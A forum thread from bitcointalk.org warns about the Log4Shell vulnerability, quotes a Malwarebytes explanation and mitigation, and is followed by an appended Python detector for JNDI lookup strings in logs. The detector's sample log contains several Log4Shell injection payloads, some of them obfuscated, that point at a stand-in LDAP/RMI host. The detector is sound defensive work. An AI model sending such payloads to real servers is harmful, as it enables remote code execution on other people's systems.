
Topic: Apache Log4Shell zero-day vulnerability

legendary
Activity: 2212
Merit: 3148
₿uy / $ell ..oeleo ;(
December 17, 2021, 08:11:32 AM
#7
I heard about this when it happened and at that time thought about the impact on bitcointalk.org, but AFAICT we were never affected, since we don't use any Java software (neither software we've written nor off-the-shelf software). Since the issue is so pervasive, it is conceivable that we could've been affected via a service provider or through some method that I haven't thought of, but I don't think so.

Cloudflare was the only service I could think of, but they have fixed it.

@theymos, Please let me know where I should share such breach/hack/bug info which can affect crypto users in a way? Which section is the most appropriate? Until now I've mostly used the B&H as newbies are the ones that are most likely affected and have the least protection (in general).
administrator
Activity: 5222
Merit: 13032
December 14, 2021, 11:42:40 AM
#6
I heard about this when it happened and at that time thought about the impact on bitcointalk.org, but AFAICT we were never affected, since we don't use any Java software (neither software we've written nor off-the-shelf software). Since the issue is so pervasive, it is conceivable that we could've been affected via a service provider or through some method that I haven't thought of, but I don't think so.
legendary
Activity: 2772
Merit: 2846
December 14, 2021, 06:16:26 AM
#5
Thanks, did the mods move that thread to Off-Topic from here?

Somebody did. Yesterday that topic was (still) in Beginners and Help. (Clearly not the best place, I know.)

I'll leave this here, and the mods can delete it if they want. Maybe somebody might get alerted to the zero-day if they see it here.

legendary
Activity: 3668
Merit: 6382
Looking for campaign manager? Contact icopress!
December 14, 2021, 06:05:40 AM
#4
Thanks, did the mods move that thread to Off-Topic from here?

Somebody did. Yesterday that topic was (still) in Beginners and Help. (Clearly not the best place, I know.)
legendary
Activity: 2772
Merit: 2846
December 14, 2021, 05:59:57 AM
#3
This was already posted 4 days ago: https://bitcointalksearch.org/topic/warning-log4shell-rce-0-day-exploit-found-in-log4j2this-is-gonna-be-huuuuge-5376340

And although I can understand that it's not related to bitcoin, the fact mods have buried that thread in Off-Topic looks a bit unfair. Probably that's also why you've missed it.

Thanks, did the mods move that thread to Off-Topic from here?
legendary
Activity: 3668
Merit: 6382
Looking for campaign manager? Contact icopress!
December 14, 2021, 05:55:41 AM
#2
This was already posted 4 days ago: https://bitcointalksearch.org/topic/warning-log4shell-rce-0-day-exploit-found-in-log4j2this-is-gonna-be-huuuuge-5376340

And although I can understand that it's not related to bitcoin, the fact mods have buried that thread in Off-Topic looks a bit unfair. Probably that's also why you've missed it.
legendary
Activity: 2772
Merit: 2846
December 14, 2021, 05:47:47 AM
#1
If this forum uses the Apache Log4j logging tool it's vulnerable to the new Log4Shell critical zero-day vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Any system using it needs upgrading, or the mitigation applying.

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

Quote
All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation.

The vulnerability is triggered by a simple string sent to a vulnerable server:

[example string blocked by cloudflare]

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

Quote
Mitigation

Mitigations are available for versions of log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

According to the Apache log4j project, if you are unable to upgrade, for whatever reason, you can mitigate this vulnerability in version 2.10.0 or higher by switching log4j2.formatMsgNoLookups to true. This can be done by adding -Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.
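The quoted explanation says the bug fires when the application logs a string containing a JNDI lookup, and that the mitigation is either an upgrade or the formatMsgNoLookups flag on 2.10+. The following is an added example, not code from the forum thread or from the Malwarebytes post: a small Python detector that normalises the common lookup obfuscations (`${lower:j}`, `${upper:...}`, and the `${name:-default}` fallback trick) before looking for `${jndi:<scheme>:`, run over a few constructed access-log lines, plus a checker that applies the post's upgrade-or-flag rule to a `log4j-core-*.jar` name and a JVM argument list. The log lines, IP addresses, jar names and the `min_fixed` threshold are assumptions for the demo; the threshold defaults to the 2.15.0 value the post quotes, and later Apache advisories raised the recommended minimum, so pass the version your own advisory source gives.

```python
"""Added example: detect Log4Shell-style JNDI lookups in log lines and
check a log4j-core jar/JVM-args pair against the upgrade-or-flag rule
quoted in the thread. Not code from the forum or the quoted article."""
import re
from typing import List, Optional, Tuple

# Innermost ${...} (no nested ${ inside). Resolved repeatedly, inside-out.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# Obfuscation tricks seen in payloads: ${lower:j}, ${upper:J}, and
# ${env:DOES_NOT_EXIST:-j} / ${::-j}, where the missing variable makes the
# lookup fall back to the attacker-chosen default.
def _resolve_one(m: "re.Match") -> str:
    body = m.group(1)
    kind, _, rest = body.partition(":")
    kind = kind.lower()
    if kind == "jndi":
        return m.group(0)            # leave the jndi lookup for the detector
    if ":-" in body:                 # ${x:y:-default} -> default
        return body.split(":-", 1)[1]
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    return m.group(0)                # unknown lookup (e.g. ${date:...}): keep

def normalize(s: str, max_rounds: int = 20) -> str:
    """Peel nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_one, s)
        if new == s:
            break
        s = new
    return s

# ${jndi:<scheme>:...}  e.g. ldap, ldaps, rmi, dns, iiop
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)

def find_jndi(line: str) -> Tuple[str, List[str]]:
    """Return (normalised line, list of JNDI schemes found)."""
    norm = normalize(line)
    return norm, [m.group(1).lower() for m in _JNDI.finditer(norm)]

def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(line index, schemes) for every line that carries a JNDI lookup."""
    out = []
    for i, line in enumerate(lines):
        _, hits = find_jndi(line)
        if hits:
            out.append((i, hits))
    return out

# Constructed sample access log; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:22:14:03 +0000] "GET /login HTTP/1.1" 200 118 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:22:14:04 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:22:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOTSET:-j}ndi:${::-l}${::-d}ap://198.51.100.7/b}"',
    '192.0.2.9 - - [10/Dec/2021:22:14:09 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 9 "-" "-"',
]

# --- upgrade-or-flag check, following the rule quoted in the post -------
_JAR = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)")

def log4j_core_version(jar_name: str) -> Optional[Tuple[int, int, int]]:
    """Version triple from a log4j-core jar name, or None (e.g. log4j 1.x names)."""
    m = _JAR.search(jar_name)
    return tuple(int(x) for x in m.groups()) if m else None  # type: ignore

def is_mitigated(jar_name: str, jvm_args: List[str],
                 min_fixed: Tuple[int, int, int] = (2, 15, 0)) -> bool:
    """True if version >= min_fixed, or 2.10.0+ started with
    -Dlog4j2.formatMsgNoLookups=true. min_fixed is an assumed parameter:
    the post quotes 2.15.0; later advisories raised it."""
    v = log4j_core_version(jar_name)
    if v is None:
        return False                 # unknown version: treat as not mitigated
    if v >= min_fixed:
        return True
    flag = any(a.lower() == "-dlog4j2.formatmsgnolookups=true" for a in jvm_args)
    return v >= (2, 10, 0) and flag

if __name__ == "__main__":
    for idx, schemes in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {','.join(schemes)}")
    print(is_mitigated("log4j-core-2.14.1.jar", ["-Dlog4j2.formatMsgNoLookups=true"]))
```

Running the module prints the three hostile lines (1, 2 and 3) with their schemes and ignores the benign `${date:yyyy}` lookup on the last line. The detector is only a log-side check; it reports that a lookup string was received, not whether the receiving application's log4j actually resolved it, so pair it with the jar/flag check on the hosts that wrote those logs.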

